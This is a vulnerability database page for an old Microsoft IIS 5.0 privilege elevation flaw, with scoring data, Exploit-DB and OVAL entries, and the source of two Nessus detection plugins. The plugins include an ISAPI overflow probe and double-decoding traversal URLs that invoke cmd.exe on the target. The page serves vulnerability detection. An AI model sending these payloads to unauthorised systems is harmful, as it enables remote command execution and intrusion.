Vulnerabilities > CVE-2001-0507 - Unspecified vulnerability in Microsoft Internet Information Services 5.0
Attack vector
LOCAL Attack complexity
LOW Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
COMPLETE Availability impact
COMPLETE Summary
IIS 5.0 uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a Trojan horse file, aka the "System file listing privilege elevation" vulnerability.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 |
Exploit-Db
| description | Microsoft IIS 5.0 In-Process Table Privelege Elevation Vulnerability. CVE-2001-0507 . Local exploit for windows platform |
| id | EDB-ID:21072 |
| last seen | 2016-02-02 |
| modified | 2001-08-15 |
| published | 2001-08-15 |
| reporter | Digital Offense |
| source | https://www.exploit-db.com/download/21072/ |
| title | Microsoft IIS 5.0 - In-Process Table Privelege Elevation Vulnerability |
Nessus
NASL family Web Servers NASL id IIS_ISAPI_OVERFLOW.NASL description There last seen 2020-06-01 modified 2020-06-02 plugin id 10685 published 2001-06-19 reporter This script is Copyright (C) 2001-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10685 title Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044) code # # (C) Tenable Network Security, Inc. # # This script was written by Renaud Deraison <[email protected]> # It was modified by H D Moore to not crash the server during the test # # Supercedes MS01-033 include("compat.inc"); if(description) { script_id(10685); script_version ("1.51"); script_cve_id( "CVE-2001-0544", "CVE-2001-0545", "CVE-2001-0506", "CVE-2001-0507", "CVE-2001-0508", "CVE-2001-0500"); script_bugtraq_id(2690, 2880, 3190, 3193, 3194, 3195); script_xref(name:"MSFT", value:"MS01-033"); script_xref(name:"MSFT", value:"MS01-044"); script_xref(name:"MSKB", value:"294774"); script_xref(name:"MSKB", value:"297860"); script_xref(name:"MSKB", value:"298340"); script_xref(name:"MSKB", value:"300972"); script_xref(name:"MSKB", value:"301625"); script_xref(name:"MSKB", value:"304867"); script_xref(name:"MSKB", value:"305359"); script_name(english:"Microsoft IIS ISAPI Filter Multiple Vulnerabilities (MS01-044)"); script_set_attribute(attribute:"synopsis", value: "The remote web server is affected by multiple vulnerabilities." ); script_set_attribute(attribute:"description", value: "There's a buffer overflow in the remote web server through the ISAPI filter. It is possible to overflow the remote web server and execute commands as user SYSTEM. Additionally, other vulnerabilities exist in the remote web server since it has not been patched." ); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-033" ); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044" ); script_set_attribute(attribute:"solution", value: "Apply the patches from the bulletins above." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"plugin_publication_date", value: "2001/06/19"); script_set_attribute(attribute:"patch_publication_date", value: "2001/06/18"); script_set_attribute(attribute:"vuln_publication_date", value: "2001/05/06"); script_cvs_date("Date: 2018/11/15 20:50:25"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis"); script_end_attributes(); script_summary(english:"Tests for a remote buffer overflow in IIS"); script_category(ACT_ATTACK); script_family(english:"Web Servers"); script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc."); script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl"); script_require_ports("Services/www", 80); exit(0); } # The attack starts here include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = get_http_port(default:80); b = get_http_banner(port: port); if ("IIS" >!< h ) exit(0); w = http_send_recv3(method: "GET", port: port, item: "/x.ida?"+crap(length:220, data:"x")+"=x"); if (isnull(w)) exit(1, "the web server did not answer"); r = strcat(w[0], w[1], '\r\n', w[2]); # 0xc0000005 == "Access Violation" if ("0xc0000005" >< r) { security_hole(port); }NASL family Web Servers NASL id IIS_DECODE_BUG.NASL description When IIS receives a user request to run a script, it renders the request in a decoded canonical form, and then performs security checks on the decoded request. A vulnerability results because a second, superfluous decoding pass is performed after the initial security checks are completed. Thus, a specially crafted request could allow an attacker to execute arbitrary commands on the IIS Server. last seen 2020-06-01 modified 2020-06-02 plugin id 10671 published 2001-05-15 reporter This script is Copyright (C) 2001-2018 Matt Moore / H D Moore source https://www.tenable.com/plugins/nessus/10671 title MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check) code # # This script was modified Matt Moore ([email protected]) # from the NASL script to test for the UNICODE directory traversal # vulnerability, originally written by Renaud Deraison. # # Then Renaud took Matt's script and used H D Moore modifications # to iis_dir_traversal.nasl ;) # # Changes by Tenable: # - Touched up description (11/04/10) # - Add MSKB script_xref (8/29/17) include("compat.inc"); if (description) { script_id(10671); script_version("1.62"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_cve_id("CVE-2001-0333", "CVE-2001-0507"); script_bugtraq_id(2708, 3193); script_xref(name:"MSFT", value:"MS01-026"); script_xref(name:"MSFT", value:"MS01-044"); script_xref(name:"MSKB", value:"288855"); script_xref(name:"MSKB", value:"293826"); script_xref(name:"MSKB", value:"294370"); script_xref(name:"MSKB", value:"294774"); script_xref(name:"MSKB", value:"295534"); script_xref(name:"MSKB", value:"297860"); script_xref(name:"MSKB", value:"298340"); script_xref(name:"MSKB", value:"301625"); script_xref(name:"MSKB", value:"304867"); script_xref(name:"MSKB", value:"305359"); script_name(english:"MS01-026 / MS01-044: Microsoft IIS Remote Command Execution (uncredentialed check)"); script_summary(english:"Determines if arbitrary commands can be executed"); script_set_attribute(attribute:"synopsis", value:"Arbitrary commands can be executed on the remote web server."); script_set_attribute(attribute:"description", value: "When IIS receives a user request to run a script, it renders the request in a decoded canonical form, and then performs security checks on the decoded request. A vulnerability results because a second, superfluous decoding pass is performed after the initial security checks are completed. Thus, a specially crafted request could allow an attacker to execute arbitrary commands on the IIS Server."); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-026"); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/ms01-044"); script_set_attribute(attribute:"solution", value:"Microsoft has released a set of patches for IIS 4.0 and 5.0."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2001/05/15"); script_set_attribute(attribute:"patch_publication_date", value:"2001/05/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2001/05/15"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2001-2020 Matt Moore / H D Moore"); script_family(english:"Web Servers"); script_dependencie("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl"); script_require_ports("Services/www", 80); exit(0); } include("global_settings.inc"); include("http_func.inc"); include("http_keepalive.inc"); port = get_http_port(default:80, embedded:TRUE); banner = get_http_banner(port:port); if ( "IIS" >!< banner ) exit(0); if ( banner =~ "Microsoft-IIS/[6-9]" ) exit(0); if(!get_port_state(port))exit(0); dir[0] = "/scripts/"; dir[1] = "/msadc/"; dir[2] = "/iisadmpwd/"; dir[3] = "/_vti_bin/"; # FP dir[4] = "/_mem_bin/"; # FP dir[5] = "/exchange/"; # OWA dir[6] = "/pbserver/"; # Win2K dir[7] = "/rpc/"; # Win2K dir[8] = "/cgi-bin/"; dir[9] = "/"; uni[0] = "%255c"; dots[0] = ".."; uni[1] = "%%35c"; dots[1] = ".."; uni[2] = "%%35%63"; dots[2] = ".."; uni[3] = "%25%35%63"; dots[3] = ".."; uni[4] = "%252e"; dots[4] = "/."; function check(req) { local_var r, pat, pat2; r = http_keepalive_send_recv(port:port, data:http_get(item:req, port:port)); if(r == NULL) { exit(0); } pat = "<DIR>"; pat2 = "Directory of C"; if((pat >< r) || (pat2 >< r)){ security_hole(port:port, extra: strcat('\n Requesting\n ', build_url(port: port, qs: req), '\n produces :\n\n', r)); return(1); } return(0); } cmd = "/winnt/system32/cmd.exe?/c+dir+c:\\+/OG"; for(d=0;dir[d];d=d+1) { for(i=0;uni[i];i=i+1) { url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], cmd); if(check(req:url))exit(0); } } # Slight variation- do the same, but don't put dots[i] in front # of cmd (reported on vuln-dev) for(d=0;dir[d];d=d+1) { for(i=0;uni[i];i=i+1) { url = string(dir[d], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], dots[i], uni[i], cmd); if(check(req:url))exit(0); } }
Oval
accepted 2007-08-02T14:47:16.301-04:00 class vulnerability contributors name Christine Walzer organization The MITRE Corporation name Robert L. Hollis organization ThreatGuard, Inc.
description IIS 5.0 uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a Trojan horse file, aka the "System file listing privilege elevation" vulnerability. family windows id oval:org.mitre.oval:def:909 status accepted submitted 2004-05-04T12:00:00.000-04:00 title Windows NT IIS System File Listing Privilege Elevation Vulnerability version 28 accepted 2005-02-16T12:00:00.000-04:00 class vulnerability contributors name Christine Walzer organization The MITRE Corporation name Christine Walzer organization The MITRE Corporation
description IIS 5.0 uses relative paths to find system files that will run in-process, which allows local users to gain privileges via a Trojan horse file, aka the "System file listing privilege elevation" vulnerability. family windows id oval:org.mitre.oval:def:912 status accepted submitted 2004-05-04T12:00:00.000-04:00 title Windows 2000 IIS System File Listing Privilege Elevation Vulnerability version 66
References
- http://online.securityfocus.com/archive/1/205069
- http://www.ciac.org/ciac/bulletins/l-132.shtml
- http://www.osvdb.org/5607
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2001/ms01-044
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6985
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A909
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A912